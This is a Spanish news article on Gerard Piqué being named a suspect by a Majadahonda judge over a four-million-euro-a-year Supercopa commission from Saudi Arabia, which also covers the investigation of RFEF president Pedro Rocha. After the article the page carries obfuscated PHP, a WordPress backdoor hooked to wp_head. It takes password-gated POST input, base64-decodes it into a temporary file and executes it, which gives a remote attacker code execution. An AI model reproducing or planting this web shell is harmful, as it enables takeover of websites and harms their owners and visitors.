Piqué es imputado por las comisiones de la Supercopa

La magistrada ve indicios de delito en la comisión de cuatro millones de euros al año que pactó con la RFEF recibir de Arabia Saudí.

Gerard Piqué ha sido imputado en el marco de la investigación abierta por las presuntas irregularidades cometidas en la Real Federación Española de Fútbol (RFEF) durante la presidencia de Luis Rubiales.La magistrada que investiga la causa considera que hay indicios de delito en la comisión de 4 millones de euros al año que pactó llevarse de Arabia Saudí con la RFEF.

Así consta en un auto, en la que la jueza Delia Rodrigo también atribuye la condición de investigados a la mercantil Gruconsa; al abogado Tomás González Cueto; al amigo de Rubiales Francisco Javier Martín Alcaide, ‘Nene’; la mujer de ‘Nene’, Purificación Rufino Domínguez; el antiguo responsable de los servicios jurídicos de la RFEF, Pedro González Segura. Contra esta resolución, los investigados pueden interponer un recurso de reforma en el plazo de tres días o de apelación en un período de cinco días.

El origen de la imputación de Piqué está en los acuerdos firmados el 11 de septiembre de 2019 entre la RFEF y las autoridades de Arabia Saudí (SELA SPORT COMPANY Lid.) para la celebración de la Supercopa. En ese acuerdo, se fijaba una prima de éxito (comisión) en favor de una “tercera parte agente” que no se identificaba; la misma alcanza los 4 millones de euros año frente a los 40 millones correspondientes al pago anual en favor de la RFEF durante seis temporadas. Por esa comisión está ahora investigado Piqué como ese “tercer agente” a través de su empresa Kosmos.

La jueza se detiene, precisamente, en ese punto del acuerdo: “Tanto en el contrato como en la adenda, se incluyó además una cláusula que se denominó “esencial”, por la que la RFEF trataba de garantizar el pago de la comisión de 4.000.000€ anuales a favor de Kosmos, aun cuando esta empresa formalmente sería la comisionista de SELA. Al tiempo del contrato, el investigado, Gerard Piqué Bernabéu, era jugador en activo del FC Barcelona, equipo que participaba en la Supercopa”.

Los movimientos judiciales previos

La magistrada de Majadahonda, que instruye el caso, ya había ordenado bloquear la cuenta bancaria de la empresa Kosmos Football, vinculada al exjugador del Barcelona y de la selección española, Gerard Piqué. Cabe recordar que Rodrigo también había requerido a unos 15 bancos que le facilitaran información sobre 96 cuentas bancarias a nombre del exfutbolista y otras 36 de las que el expresidente de la RFEF Luis Rubiales es titular.

En el marco de la causa, la magistrada también ha interrogado al expresidente de la RFEF Luis Rubiales, el principal investigado en la causa, por su gestión entre 2018 y 2023, con el foco puesto en el traslado de la Supercopa y en el presunto desvío de fondos e irregularidades asociadas a contratos.

Se confirma la imputación de Rocha

En el auto, la jueza Rodrigo también hace referencia a la actuación del actual presidente de la RFEF, Pedro Rocha, en relación a su actuación con el contrato sellado con Arabia Saudí. En aquel momento, era vicepresidente del área económica, y entre las funciones de su cargo le habría correspondido, según la normativa interna federativa, intervenir a través de la Comisión económica que presidía sobre las adendas de ese contrato. “Sin embargo, se abstuvo, al parecer, tanto de convocar a la Comisión económica para analizar dichas prórrogas y añadidos al contrato de 11-9-2019, como, para el caso de no haber sido informado a tiempo o de habérsele ocultado, reclamar el expediente a posteriori dado el cargo que desempeñaba. Lo mismo cabe decir respecto a su actuación -u omisión de ella- en cuanto a las obras del estadio de la Cartuja de Sevilla”, asegura la jueza en su escrito. De esta forma, se confirma que Rocha está bajo la condición de investigado en el proceso judicial abierto, aunque el actual presidente de la RFEF aún no ha sido notificado sobre el motivo de dicha investigación.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}